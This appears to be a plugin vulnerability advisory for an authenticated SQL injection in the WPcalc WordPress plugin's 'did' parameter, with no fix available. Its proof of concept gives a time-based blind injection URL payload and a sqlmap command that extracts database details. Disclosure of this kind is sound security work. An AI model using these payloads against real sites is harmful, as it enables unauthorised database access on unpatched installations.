WordPress Plugin Vulnerabilities

WPcalc <= 2.1 - Authenticated SQL Injection

Description

The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability.

Plugin author closed the plugin.

Proof of Concept

http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl)

or, using the sqlmap tool:

./sqlmap.py -r request.txt -dbms=mysql --current-user -b -p did --batch --flush-session

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
0xdecafbad
Verified
Yes

Timeline

Publicly Published
2021-12-06 (about 2 years ago)
Added
2021-12-09 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other